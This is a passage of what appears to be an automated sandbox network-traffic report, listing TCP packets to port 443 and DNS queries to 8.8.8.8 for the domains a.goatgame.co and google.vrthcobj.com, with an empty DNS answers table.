Aug 3, 2021 23:38:09.664408922 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.664449930 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.664486885 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.664499998 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.664524078 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.664568901 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.665211916 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.665252924 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.665288925 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.665326118 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.665338039 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.665381908 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.665996075 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.666038036 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.666074038 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.666105032 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.666111946 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.666168928 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.666789055 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.666830063 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.666865110 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.666901112 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.666912079 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.666969061 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.667613983 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.667653084 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.667701006 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.667704105 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.667738914 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.667789936 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.910660028 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.910722971 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.910767078 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.910797119 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.910799026 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.910859108 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.911010981 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.911051989 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.911079884 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.911108017 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.911703110 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.911742926 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.911775112 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.911792994 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.911844969 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.911849976 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.911899090 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.911935091 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.911950111 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.912362099 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.912444115 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.913585901 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.913625956 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.913676977 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.913677931 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.913718939 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.913780928 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.913855076 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.914655924 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.914696932 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.914716959 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.914736032 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.914774895 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.914783955 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.915035009 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.915092945 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.915102005 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.915155888 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.915215015 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.915311098 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.915352106 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.915378094 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.915404081 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.915745020 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.915786982 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.915817976 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.915826082 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.915863991 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.915879011 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.916543961 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.916608095 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.916790009 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.916838884 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.916879892 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.916901112 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.916917086 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.916971922 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.917387009 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.922727108 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.922780037 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.922796965 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.922820091 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.922856092 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.922868013 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.923054934 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.923094988 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.923130989 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.923166990 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.923214912 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.923233986 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.923918962 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.923959970 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.923994064 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.923995018 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.924038887 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.924046993 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.966636896 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:10.178009033 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.178060055 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.178098917 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.178113937 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:10.178134918 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.178178072 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:10.178282022 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.178335905 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.178373098 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.178379059 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:10.178411007 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.178452969 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:10.179136992 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.179194927 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.179235935 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.179239035 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:10.179275036 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.179316044 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:10.179970980 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.180037022 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.180078030 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:10.180095911 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.180171013 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.180212975 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:10.180704117 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.180746078 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.180794954 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:10.180794954 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.180838108 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.180879116 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:10.181494951 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.181534052 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.181572914 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:10.181580067 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.181622028 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.181663990 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:10.182307959 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.182363987 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.182406902 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:10.182415009 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.182456970 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.182528019 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:10.183094025 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.183165073 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.183228016 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:10.183697939 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.183758974 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.183811903 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.183845043 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:10.183866978 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.183923960 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:10.184259892 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.184302092 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.184338093 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.184350967 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:10.184376001 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.184427977 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:10.185126066 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.185894966 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.185936928 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.185959101 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:10.185975075 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.186011076 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.186017990 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:10.186278105 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.186335087 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:10.434608936 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.434657097 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:10.434726000 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:10.461230040 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:10.478038073 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.007041931 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.007091999 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.007128954 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.007179976 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.007181883 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.007245064 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.007430077 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.007476091 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.007497072 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.007544041 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.011317968 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.011344910 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.011359930 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.011393070 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.011449099 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.011475086 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.011651993 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.011727095 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.264836073 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.264915943 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.264960051 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.265018940 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.265077114 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.265129089 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.265137911 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.265182972 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.265232086 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.265289068 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.265681028 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.265805960 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.267560005 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.267623901 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.267678022 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.267745018 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.267760992 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.267873049 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.267914057 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.267967939 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.268028975 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.268071890 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.268086910 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.268188000 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.268698931 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.268754005 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.268807888 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.268845081 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.268865108 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.268980026 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.269480944 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.269532919 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.269594908 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.269709110 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.526300907 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.526364088 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.526418924 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.526474953 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.526494026 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.526597023 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.526607990 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.526662111 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.526699066 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.526797056 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.527069092 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.527173996 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.527188063 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.527235985 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.527291059 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.527345896 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.527853966 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.527905941 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.527961016 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.527976990 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.528032064 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.528055906 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.528636932 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.528687000 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.528734922 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.528740883 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.528794050 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.528825998 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.529442072 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.529489040 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.529547930 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.529551983 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.529609919 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.529643059 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.530283928 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.530344009 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.530389071 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.530397892 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.530452967 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.530492067 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.531094074 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.531181097 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.531213045 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.531236887 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.531277895 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:11.531316996 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:11.577164888 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:12.649585962 CEST	49708	443	192.168.2.3	172.67.146.70

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 3, 2021 23:37:56.634107113 CEST	60985	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:37:56.676135063 CEST	53	60985	8.8.8.8	192.168.2.3
Aug 3, 2021 23:37:57.231653929 CEST	50200	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:37:57.282186031 CEST	53	50200	8.8.8.8	192.168.2.3
Aug 3, 2021 23:37:57.536907911 CEST	51281	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:37:57.573438883 CEST	53	51281	8.8.8.8	192.168.2.3
Aug 3, 2021 23:37:58.592097998 CEST	49199	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:37:58.619740963 CEST	53	49199	8.8.8.8	192.168.2.3
Aug 3, 2021 23:37:59.474395037 CEST	50620	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:37:59.509958982 CEST	53	50620	8.8.8.8	192.168.2.3
Aug 3, 2021 23:37:59.696528912 CEST	64938	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:37:59.729441881 CEST	53	64938	8.8.8.8	192.168.2.3
Aug 3, 2021 23:38:01.026458025 CEST	60152	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:38:01.076482058 CEST	53	60152	8.8.8.8	192.168.2.3
Aug 3, 2021 23:38:01.869057894 CEST	57544	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:38:01.896617889 CEST	53	57544	8.8.8.8	192.168.2.3
Aug 3, 2021 23:38:03.027504921 CEST	55984	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:38:03.059770107 CEST	53	55984	8.8.8.8	192.168.2.3
Aug 3, 2021 23:38:04.618001938 CEST	64185	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:38:04.643836975 CEST	53	64185	8.8.8.8	192.168.2.3
Aug 3, 2021 23:38:05.781409025 CEST	65110	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:38:05.806092978 CEST	53	65110	8.8.8.8	192.168.2.3
Aug 3, 2021 23:38:06.049623966 CEST	58361	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:38:06.085091114 CEST	53	58361	8.8.8.8	192.168.2.3
Aug 3, 2021 23:38:06.987278938 CEST	63492	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:38:07.021372080 CEST	53	63492	8.8.8.8	192.168.2.3
Aug 3, 2021 23:38:07.800545931 CEST	60831	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:38:07.825484991 CEST	53	60831	8.8.8.8	192.168.2.3
Aug 3, 2021 23:38:08.934715986 CEST	60100	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:38:08.960048914 CEST	53	60100	8.8.8.8	192.168.2.3
Aug 3, 2021 23:38:09.537939072 CEST	53195	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:38:09.570741892 CEST	53	53195	8.8.8.8	192.168.2.3
Aug 3, 2021 23:38:10.155075073 CEST	50141	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:38:10.190376043 CEST	53	50141	8.8.8.8	192.168.2.3
Aug 3, 2021 23:38:11.050296068 CEST	53023	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:38:11.085692883 CEST	53	53023	8.8.8.8	192.168.2.3
Aug 3, 2021 23:38:12.071374893 CEST	49563	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:38:12.098846912 CEST	53	49563	8.8.8.8	192.168.2.3
Aug 3, 2021 23:38:13.260493994 CEST	51352	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:38:13.296123028 CEST	53	51352	8.8.8.8	192.168.2.3
Aug 3, 2021 23:38:13.925787926 CEST	59349	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:38:13.951874971 CEST	53	59349	8.8.8.8	192.168.2.3
Aug 3, 2021 23:38:14.363015890 CEST	57084	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:38:14.364244938 CEST	58823	53	192.168.2.3	8.8.8.8
Aug 3, 2021 23:38:14.388151884 CEST	53	57084	8.8.8.8	192.168.2.3
Aug 3, 2021 23:38:14.399341106 CEST	53	58823	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 3, 2021 23:38:06.049623966 CEST	192.168.2.3	8.8.8.8	0x9251	Standard query (0)	a.goatgame.co	A (IP address)	IN (0x0001)
Aug 3, 2021 23:38:14.363015890 CEST	192.168.2.3	8.8.8.8	0xc59	Standard query (0)	google.vrthcobj.com	A (IP address)	IN (0x0001)
Aug 3, 2021 23:38:14.364244938 CEST	192.168.2.3	8.8.8.8	0x3308	Standard query (0)	google.vrthcobj.com	28	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
